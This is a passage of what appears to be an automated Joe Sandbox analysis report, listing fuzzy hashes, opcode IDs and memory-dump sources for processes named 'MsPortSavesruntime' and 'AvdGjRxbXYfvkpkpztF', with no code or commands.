                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 70bb1c531f33297ace25c8c89efcd62f0291323e6b0f9c709edca8c4f666950c
                                                                                                                    • Instruction ID: 777d7a1e4034bfb5c175eb408ace8ee5c40ad20370e0dbc44679b1d553f4c0e1
                                                                                                                    • Opcode Fuzzy Hash: 70bb1c531f33297ace25c8c89efcd62f0291323e6b0f9c709edca8c4f666950c
                                                                                                                    • Instruction Fuzzy Hash: 0D213821B1D90D0FE798F76C94AA67977C2EF98324F1101BDE40EC32FADD68AD418285
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2068532571.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ffd9bac0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 2d19dddb6dfe0f5b4af2bc7d74e14b53a81526de3b71fa2d2103b206c3b656ca
                                                                                                                    • Instruction ID: b6cec903e2aa90a077486d85d97d40e7622486630c4101bf4e652d9e736b6648
                                                                                                                    • Opcode Fuzzy Hash: 2d19dddb6dfe0f5b4af2bc7d74e14b53a81526de3b71fa2d2103b206c3b656ca
                                                                                                                    • Instruction Fuzzy Hash: 3331B531A0D68E8FDB56EB64C8649B97BF0EF26300B0905FFC009D71A3DA68A944CB51
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2068532571.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ffd9bac0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 784d1e7436522d3df1593af5143affb13ecfa16456f9b60145bf9c611ccf00c8
                                                                                                                    • Instruction ID: a0c97c0acc248f613b851f17a3c2fbfb12cd1ed807df1f2eae7a5298642e4f79
                                                                                                                    • Opcode Fuzzy Hash: 784d1e7436522d3df1593af5143affb13ecfa16456f9b60145bf9c611ccf00c8
                                                                                                                    • Instruction Fuzzy Hash: 63213031F1950D4BFBB4F79884686B862E1FF58310F6241B9D44ED32B6DE786E418708
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2068532571.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ffd9bac0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8a10f69d9ac5efcc454f047a8b6bfc6ed6099ee9d8fc5ee3f4e08bb3ac5b96f9
                                                                                                                    • Instruction ID: 1f253f5e5197c7ced883bc0e17c2b4734ac58521d306cb90e1619b391f559f97
                                                                                                                    • Opcode Fuzzy Hash: 8a10f69d9ac5efcc454f047a8b6bfc6ed6099ee9d8fc5ee3f4e08bb3ac5b96f9
                                                                                                                    • Instruction Fuzzy Hash: B7210735B0E68D8FE331E7A888511EC7FA0EF42314F1642B7C0508B1D3D97816458745
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2068532571.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ffd9bac0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9434388d609abc1f259ea2801802486b2061b5c20e93d850d27675ccda294e57
                                                                                                                    • Instruction ID: 2aa8650e4046a187df07f8414a0af36b480aaa1275deee1cd88d911098b24241
                                                                                                                    • Opcode Fuzzy Hash: 9434388d609abc1f259ea2801802486b2061b5c20e93d850d27675ccda294e57
                                                                                                                    • Instruction Fuzzy Hash: BE11C635A0E78D8FE722EB6888512EC7FB0EF52315F0646F7C084DB1A3D97416498785
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2068532571.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ffd9bac0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 8963c21d1a323c8b74631612d24d305c18d6772e1cb39d67d3dfed058f98428c
                                                                                                                    • Instruction ID: f93db00781bd22348742cc4208550ff4ed37fb697949d6b904234c88cec8d296
                                                                                                                    • Opcode Fuzzy Hash: 8963c21d1a323c8b74631612d24d305c18d6772e1cb39d67d3dfed058f98428c
                                                                                                                    • Instruction Fuzzy Hash: D801A135A0E78C8FE722EB6888642ED7FB0AF42314F0645E7C084DB1A2D97456488B81
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2068532571.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ffd9bac0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ae29db0c130df9ddc6c34481119400e87fb7605e1778b724cb992ac96c29223c
                                                                                                                    • Instruction ID: 64432ddba38170886329558724d429623932807f16ab7c6df1083636becd8f48
                                                                                                                    • Opcode Fuzzy Hash: ae29db0c130df9ddc6c34481119400e87fb7605e1778b724cb992ac96c29223c
                                                                                                                    • Instruction Fuzzy Hash: 37016231A1991CCFCB59EB48C8A4AE9B3F1FB68300F11416DD04ED32A5DE74EA41CB81
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2068532571.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ffd9bac0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c78c220df84002c2ae55ea5273d0ad61adc386d5d14dab9d13cc75d3d01402b9
                                                                                                                    • Instruction ID: 59f8fd2efbc150a5d44f100d1a1a2bc09edf15bcecf65a165e36e422e3060799
                                                                                                                    • Opcode Fuzzy Hash: c78c220df84002c2ae55ea5273d0ad61adc386d5d14dab9d13cc75d3d01402b9
                                                                                                                    • Instruction Fuzzy Hash: A5F03131A4D50E4BEB74FB94D4546F833A1FB94310F26417DD40ED32B6DDB86A818A08
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2068532571.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ffd9bac0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 587f863c12d382b9e95aac177516d16524a4dc93ab85f67bf209bc58b6a2ef90
                                                                                                                    • Instruction ID: b98fccd0d8eebff63d902f2398e7fa61d992de4464224f0fcc083a80d85286cb
                                                                                                                    • Opcode Fuzzy Hash: 587f863c12d382b9e95aac177516d16524a4dc93ab85f67bf209bc58b6a2ef90
                                                                                                                    • Instruction Fuzzy Hash: 46F0AB3120E64CCFDB41EB3CDCA50E43B50EF43208B4B12FBC088C7562C210184AC700
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2068532571.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ffd9bac0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 50b7fee551aa51ed4495b90d960ea2dfa2fd4974072c7181fe5fb3249bceb4ed
                                                                                                                    • Instruction ID: 4430b26e91a70c5c8131641020c4af48e9d1b69953c89250b1d673a4ef5f73f6
                                                                                                                    • Opcode Fuzzy Hash: 50b7fee551aa51ed4495b90d960ea2dfa2fd4974072c7181fe5fb3249bceb4ed
                                                                                                                    • Instruction Fuzzy Hash: C5018F34A0E3898FE722EBA488542ADBFB0AF02314F1541E7D484DB1A7D9785748C741
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2068532571.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ffd9bac0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 285c13927dcb1f53607f0379e68cf6e7d7e4812785c5a902db2b089683fb3e8f
                                                                                                                    • Instruction ID: d26696a46681e285d400bfd58b341776aed3c857c9dee7354f98390e533c6bd1
                                                                                                                    • Opcode Fuzzy Hash: 285c13927dcb1f53607f0379e68cf6e7d7e4812785c5a902db2b089683fb3e8f
                                                                                                                    • Instruction Fuzzy Hash: ACE01A06F5FA2F02E57537ED68660FC72104FC4A28FA60172E41C860E6ACCE2685026A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2068532571.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ffd9bac0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: ce0594d74662a3e7710401447a1c56f810fad8591153e79ac0b3614562c5ba31
                                                                                                                    • Instruction ID: c2277998880809ceab64d287fd723d811344b58b83f6a113f6022b812cc2b603
                                                                                                                    • Opcode Fuzzy Hash: ce0594d74662a3e7710401447a1c56f810fad8591153e79ac0b3614562c5ba31
                                                                                                                    • Instruction Fuzzy Hash: 9CE09270F0B50E4EF370BBA0C425BB9A2509F50300F0505B8D54E972E2CDFC6D808B89
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2068532571.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ffd9bac0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3b92d3f144aede9e6181f2497ac721954f2672474d374f7de5f8882d50639694
                                                                                                                    • Instruction ID: 1c32909861c96b3207cd2d36d8682487678e3cdc2fdc7e9030ad91c2bad8b023
                                                                                                                    • Opcode Fuzzy Hash: 3b92d3f144aede9e6181f2497ac721954f2672474d374f7de5f8882d50639694
                                                                                                                    • Instruction Fuzzy Hash: 18D05E00F1D45A5BE36AA36408208BA04860F95328F090234A01E962E9EC9C1A0152C3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2068532571.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ffd9bac0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b764fbe3770bf2e3e072d769b89b0d506276cd4e1d123e9c4e624545fc2e8e70
                                                                                                                    • Instruction ID: b720bbda805eb6feea1ef703b78fb58e0e5b4b83c0fe90d7bb9d259d3c638fab
                                                                                                                    • Opcode Fuzzy Hash: b764fbe3770bf2e3e072d769b89b0d506276cd4e1d123e9c4e624545fc2e8e70
                                                                                                                    • Instruction Fuzzy Hash: 41C04C3052580D8FCA54FB7DC98595476A0FB0D215BD60190E40DC7171E69A9D95D741
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2068532571.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ffd9bac0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: b85f0a8e6a2451d9c4378ef74c9e503b4979580af63c6cf82275b230b594eae9
                                                                                                                    • Instruction ID: f9bd5b7c055a8adc5226548f1e553392da6241cdc07abab4a0ce757127c62410
                                                                                                                    • Opcode Fuzzy Hash: b85f0a8e6a2451d9c4378ef74c9e503b4979580af63c6cf82275b230b594eae9
                                                                                                                    • Instruction Fuzzy Hash: C3C08C3051180C8FC908FB28C88582833A0FB09300BC20090E008C7174D259DCC0C741
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.2068532571.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_7ffd9bac0000_MsPortSavesruntime.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 4ed4acf919981f74455dc4cc80fb6e6734cc38eca516e527d93556e62a2cdd7c
                                                                                                                    • Instruction ID: db7d7326a4ed3d64de75acb640173bc13af19e40b23d4564a226e3b22930fddb
                                                                                                                    • Opcode Fuzzy Hash: 4ed4acf919981f74455dc4cc80fb6e6734cc38eca516e527d93556e62a2cdd7c
                                                                                                                    • Instruction Fuzzy Hash: 4DB01200D5740F00E83433FA085607970405B44100FD20170D80C81091D8CE12D4034A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.2825511988.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_7ffd9bad0000_AvdGjRxbXYfvkpkpztF.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3a8df31e2a587784ca296952ede882b493ae621526d623d59da1f9bba7ec9895
                                                                                                                    • Instruction ID: 434f0cfd24a501d58becc9acc391eb433a67807af630b6e3117dfdb6115aa9c5
                                                                                                                    • Opcode Fuzzy Hash: 3a8df31e2a587784ca296952ede882b493ae621526d623d59da1f9bba7ec9895
                                                                                                                    • Instruction Fuzzy Hash: 2CC2C731B1D91E4FEBA8EB5884A16B87392FFA8350F1542B9D05DC72D6CE78BD418780
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.2825511988.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_7ffd9bac0000_AvdGjRxbXYfvkpkpztF.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 5Y_H
                                                                                                                    • API String ID: 0-3237497481
                                                                                                                    • Opcode ID: 9fdee1a0af2d003c75313fe89c82eff9e3d93772798941db1daca24a59609427
                                                                                                                    • Instruction ID: dfc5617d43c877c72ae4f627d7ede2b45422ad2c4fe99f0ee4b2abf09a329813
                                                                                                                    • Opcode Fuzzy Hash: 9fdee1a0af2d003c75313fe89c82eff9e3d93772798941db1daca24a59609427
                                                                                                                    • Instruction Fuzzy Hash: 6F91F471A19A8D8FE799EB6888657B87FE1FF5A314F0102BED059D72E6CBB81410C740
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.2825511988.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_7ffd9bad0000_AvdGjRxbXYfvkpkpztF.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9114a8e770a67acedd54fe8173afa2aae3ee6ae89c729e7cde08fa2f5b3ee80d
                                                                                                                    • Instruction ID: 3a0656acdbaec9009c5eb6c62baeaad8dac975f16df13307b98602dfdd10c33b
                                                                                                                    • Opcode Fuzzy Hash: 9114a8e770a67acedd54fe8173afa2aae3ee6ae89c729e7cde08fa2f5b3ee80d
                                                                                                                    • Instruction Fuzzy Hash: AD62B731B1DA1E4FEBA8EB5884A17B47392FFA8350F1542B9D01DC72D6DE78AD418B40
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.2825511988.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_7ffd9baf0000_AvdGjRxbXYfvkpkpztF.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a17ee8347e90f4854b59d3211e7f89cb5afcd3d33d968addb1be9b224deeebb4
                                                                                                                    • Instruction ID: a24b18909edbebd15dad211d0d8075b37051a24d77c19ab56562d0ca1ad67885
                                                                                                                    • Opcode Fuzzy Hash: a17ee8347e90f4854b59d3211e7f89cb5afcd3d33d968addb1be9b224deeebb4
                                                                                                                    • Instruction Fuzzy Hash: 80C19B20B1F79E0AE33D4A6848624F17B91EF92605B1A83BDC8DBC7097DD68760783C5
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.2825511988.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_7ffd9bac0000_AvdGjRxbXYfvkpkpztF.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: c9$!k9$"s9
                                                                                                                    • API String ID: 0-3426396564
                                                                                                                    • Opcode ID: 1332c719c76affe887704e93c0b8f7a3fcdb380ca1128a8470250fa08ca4048e
                                                                                                                    • Instruction ID: 9ec78bfb1d555c3c4c2e629127fbce79dfef656486633dc04b785726e2ef7695
                                                                                                                    • Opcode Fuzzy Hash: 1332c719c76affe887704e93c0b8f7a3fcdb380ca1128a8470250fa08ca4048e
                                                                                                                    • Instruction Fuzzy Hash: 6F01D12772A95E8BD641AB7EF8500F8BB40EAD7136B9603F7D044C71A2E551285AC3D0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.2825511988.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_7ffd9baf0000_AvdGjRxbXYfvkpkpztF.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: M
                                                                                                                    • API String ID: 0-3664761504
                                                                                                                    • Opcode ID: c7c5cf8004e59fb520d06a6347ab8f550ef73a922c6764a689015c0a4f7a5274
                                                                                                                    • Instruction ID: 7c7e3fe5fe840c6beee7f75f3c708aad4877dd5d01b886b77be12c4fbca549c3
                                                                                                                    • Opcode Fuzzy Hash: c7c5cf8004e59fb520d06a6347ab8f550ef73a922c6764a689015c0a4f7a5274
                                                                                                                    • Instruction Fuzzy Hash: FCF0C271A0F3C54FCB26A7794829455BF60EE2721178A45FEC086CF1B3E96D888AC701
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.2825511988.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_7ffd9baf0000_AvdGjRxbXYfvkpkpztF.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: M
                                                                                                                    • API String ID: 0-3664761504
                                                                                                                    • Opcode ID: 363512d6012de8f5d14b9cbb054f1e3c9d428e5600f169cdbad5c7567597b232
                                                                                                                    • Instruction ID: ffeeee892d929306c8fd502d9a5c907819b4fa321389c08a6bc81366d807c089
                                                                                                                    • Opcode Fuzzy Hash: 363512d6012de8f5d14b9cbb054f1e3c9d428e5600f169cdbad5c7567597b232
                                                                                                                    • Instruction Fuzzy Hash: A4E0656160E7C44FC716E735886D455BFA0EF6721174A41EFC445CF1A7DA1DC885C711
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.2825511988.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_7ffd9baf0000_AvdGjRxbXYfvkpkpztF.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: M
                                                                                                                    • API String ID: 0-3664761504
                                                                                                                    • Opcode ID: 6dd8f625966fcb3ff15a50463ebbf9ef6c6a6fba0ff2d37a7e59b1081642bab3
                                                                                                                    • Instruction ID: d4962cf6f2fa005dc551cc22f6fdec3fff525516b7be410d01324e12fa6c595d
                                                                                                                    • Opcode Fuzzy Hash: 6dd8f625966fcb3ff15a50463ebbf9ef6c6a6fba0ff2d37a7e59b1081642bab3
                                                                                                                    • Instruction Fuzzy Hash: E4E09271A0E7C44FCB16EB388869454BFA0EF6731174A42EEC086CF1A3EA2DC885C701
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.2825511988.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_7ffd9baf0000_AvdGjRxbXYfvkpkpztF.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 3c970467569523fd04c0a6b404f23043c2052c6c4f2a65260fe9767004b6fc3b
                                                                                                                    • Instruction ID: 4974e10a98240d20f1eead1f927673a56ec395e75a7b35c8e85d3c86b03ed7cb
                                                                                                                    • Opcode Fuzzy Hash: 3c970467569523fd04c0a6b404f23043c2052c6c4f2a65260fe9767004b6fc3b
                                                                                                                    • Instruction Fuzzy Hash: 50412831B19E0D4FE7A8EB58C8A56E87BE1FF58354F05427AE40DC31D6DE686D418780
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.2825511988.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_7ffd9bac0000_AvdGjRxbXYfvkpkpztF.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 92ba917037fca098fbf43119fce95b0bafa306556ceee3b661f5de3da87afb92
                                                                                                                    • Instruction ID: 7041aef670dfa724bc48fc495081e312e3616ffa7035229de11e05bd579ce1f0
                                                                                                                    • Opcode Fuzzy Hash: 92ba917037fca098fbf43119fce95b0bafa306556ceee3b661f5de3da87afb92
                                                                                                                    • Instruction Fuzzy Hash: B2412922B0D55D0AE718F7AC64A56F97780DF5933AF0406BBE44ECB1EBCE186941C285
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.2825511988.00007FFD9BAF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_7ffd9baf0000_AvdGjRxbXYfvkpkpztF.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e910b73911885c737c3f6d530a5c2af32bd9779277b50e174f336094244524b8
                                                                                                                    • Instruction ID: c6f93da26842fe8d4bd9a33285dd94ffe788f2341100f4bfa2fb256eef92a738
                                                                                                                    • Opcode Fuzzy Hash: e910b73911885c737c3f6d530a5c2af32bd9779277b50e174f336094244524b8
                                                                                                                    • Instruction Fuzzy Hash: 9C41E831B1DB198FEB68EB98C4607F47792EB98354F05027AD04ED72D6CB786D468780
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.2825511988.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_7ffd9bac0000_AvdGjRxbXYfvkpkpztF.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c1e1d9914c229dbd9bcd6af22766f95077d7bd68cadb39041d4cb235b4d11df6
                                                                                                                    • Instruction ID: 2624847859514a0d662914a94e42a8b00b68b74679f3eb408ab779cb74dad619
                                                                                                                    • Opcode Fuzzy Hash: c1e1d9914c229dbd9bcd6af22766f95077d7bd68cadb39041d4cb235b4d11df6
                                                                                                                    • Instruction Fuzzy Hash: 34210721B1990D0FE798B76C94A967977C2EF98324B1101B9E41DC32FADE68AD418281
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.2825511988.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_7ffd9bac0000_AvdGjRxbXYfvkpkpztF.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: c21023c758be89e2add1309e06c313a8642be6736a170ba6b0f2b403f1ec5073
                                                                                                                    • Instruction ID: 71ebcd6d1345abff29b786728741540dd806e67116e0e318bfb17333c904bbba
                                                                                                                    • Opcode Fuzzy Hash: c21023c758be89e2add1309e06c313a8642be6736a170ba6b0f2b403f1ec5073
                                                                                                                    • Instruction Fuzzy Hash: 0E31B531A0D68E8FDB56EB64C8649B97BF0EF26300B0905FBC009D71A3DA68A944CB51
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.2825511988.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_7ffd9bac0000_AvdGjRxbXYfvkpkpztF.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 784d1e7436522d3df1593af5143affb13ecfa16456f9b60145bf9c611ccf00c8
                                                                                                                    • Instruction ID: a0c97c0acc248f613b851f17a3c2fbfb12cd1ed807df1f2eae7a5298642e4f79
                                                                                                                    • Opcode Fuzzy Hash: 784d1e7436522d3df1593af5143affb13ecfa16456f9b60145bf9c611ccf00c8
                                                                                                                    • Instruction Fuzzy Hash: 63213031F1950D4BFBB4F79884686B862E1FF58310F6241B9D44ED32B6DE786E418708
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.2825511988.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_7ffd9bac0000_AvdGjRxbXYfvkpkpztF.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9cc23a87c6e909b4a80405a6e65b803d135be56b2f60a9b403d209a825ec4ca6
